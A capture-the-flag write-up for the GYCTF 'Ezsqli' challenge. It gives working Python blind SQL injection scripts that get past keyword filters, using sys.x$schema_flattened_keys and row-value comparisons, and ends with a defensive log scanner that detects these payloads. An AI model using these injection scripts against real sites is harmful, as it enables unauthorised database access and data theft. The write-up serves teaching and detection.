• GYCTF Ezsqli


    Fuzz 

    Fuzzing shows that and, or, if and information_schema are filtered. union and select are filtered when they appear together, but not when they are used separately. join and regexp are filtered as well.

    So blind injection is the way to go. information_schema is filtered, but it can be replaced with the sys.x$schema_flattened_keys view, which also lists tables by schema.

    While fuzzing I noticed that when the query succeeds the page echoes Nu1L, which gives the boolean oracle for the blind injection.

    Dumping the table names

    exp (exploit script):

    # -*- coding: UTF-8 -*-
    import requests

    flag = ''
    url = 'http://9ed82b30-6500-472d-af3b-2c380fc65adc.node3.buuoj.cn/index.php'

    # Boolean-based blind injection: the page echoes Nu1L when the injected
    # condition is true, so each character of the table list is recovered by
    # testing its ASCII code one value at a time.
    for i in range(1, 50):
        for j in range(32, 128):
            # sys.x$schema_flattened_keys stands in for the filtered information_schema;
            # "&&" replaces the filtered "and".
            payload = "1 && ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database())," + str(i) + ",1))=" + str(j) + "#"
            data = {'id': payload}
            res = requests.post(url, data=data)
            if 'Nu1L' in res.text:
                flag = flag + chr(j)
                print(flag)
                break
        else:
            # no ASCII code matched at this position: the table list is fully read
            break


    When dumping the column contents, for some reason the data never comes out completely......

    # -*- coding:utf8 -*-
    import requests

    url = 'http://cc6b46e3-9379-4533-8dd8-3abf48842831.node3.buuoj.cn/index.php'

    def trans(flag):
        # Encode the guess as one 0x... hex literal: no quotes are needed and the
        # comparison is done on a binary string, which makes it case-sensitive.
        res = ''
        for i in flag:
            res += hex(ord(i))
        res = '0x' + res.replace('0x', '')
        return res

    flag = ''
    for i in range(1, 700):
        # Row-value comparison blind injection: (select 1, guess) > (select * from t)
        # becomes true as soon as the guess exceeds the stored value, so the real
        # character is the one just before the first character that makes it true.
        # The upper bound is 127 (not 126) so that a trailing '}' (125) can be found.
        for char in range(32, 127):
            hexchar = trans(flag + chr(char))
            payload = '2||((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
            data = {'id': payload}
            r = requests.post(url=url, data=data)
            if 'Nu1L' in r.text:
                break
        else:
            # no guess exceeded the stored value: nothing more can be read
            break
        if char == 32:
            # even flag + ' ' is already greater than the stored value: flag is complete
            break
        flag += chr(char - 1)
        print(flag)

    Dumping the table names tests the filtering of "union select" and information_schema.

    Dumping the column contents tests case-sensitive extraction of the data.

    The challenge author's notes: https://www.smi1e.top/%e6%96%b0%e6%98%a5%e6%88%98%e7%96%ab%e5%85%ac%e7%9b%8a%e8%b5%9b-ezsqli-%e5%87%ba%e9%a2%98%e5%b0%8f%e8%ae%b0/

    Blind SQL injection without "in": https://nosec.org/home/detail/3830.html
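The defender's side of the same three tricks, as an added example that is not from the write-up or the challenge: a small log scanner that tags the boolean-blind ascii(substr()) probe, the sys.x$schema_flattened_keys substitute for information_schema, and the row-value comparison used to read the column without "in". The log line format, the rule names and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not taken from the original post): one benign
# request followed by two requests shaped like the write-up's payloads, as a
# web server might record URL-encoded POST bodies.
SAMPLE_LOG = [
    "POST /index.php body=id=7",
    "POST /index.php body=id=1+%26%26+ascii(substr((select+group_concat(table_name)"
    "from+sys.x%24schema_flattened_keys+where+table_schema%3Ddatabase())%2C1%2C1))%3D102%23",
    "POST /index.php body=id=2%7C%7C((select+1%2C0x666c6167)%3E(select+*+from+f1ag_1s_h3r3_hhhhh))",
]

# One rule per technique in the write-up, matched against the decoded,
# lower-cased, whitespace-normalised parameter value.
RULES = {
    # character-by-character boolean blind probe: ascii(substr(...))=N
    "boolean_blind_ascii_substr": re.compile(r"ascii\s*\(\s*substr\s*\("),
    # sys schema view used as a stand-in for the blocked information_schema
    "information_schema_substitute": re.compile(r"sys\.x\$schema_flattened_keys"),
    # row-value comparison against a whole row, which needs no in/like/substr
    "row_value_comparison": re.compile(r"\(\s*select\s+\d+\s*,\s*0x[0-9a-f]+\s*\)\s*[<>]=?\s*\(\s*select\b"),
}

def extract_id(line):
    """Return the decoded value of the id parameter from a log line, or None."""
    m = re.search(r"\bid=([^&\s]*)", line)
    if m is None:
        return None
    return unquote_plus(m.group(1))

def classify(value):
    """Return the sorted names of every rule the decoded value triggers."""
    norm = re.sub(r"\s+", " ", value.lower())
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def scan_log(lines):
    """Return (line_number, tags) for each line whose id value trips a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = extract_id(line)
        tags = classify(value) if value is not None else []
        if tags:
            hits.append((n, tags))
    return hits

if __name__ == "__main__":
    for n, tags in scan_log(SAMPLE_LOG):
        print(n, ", ".join(tags))
```

Normalising before matching matters because the write-up's payloads already show that the server-side blacklist was defeated by spacing and by swapping keywords, so a detector keyed on exact strings would miss them too.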

  • Original post: https://www.cnblogs.com/tiaopidejun/p/12367855.html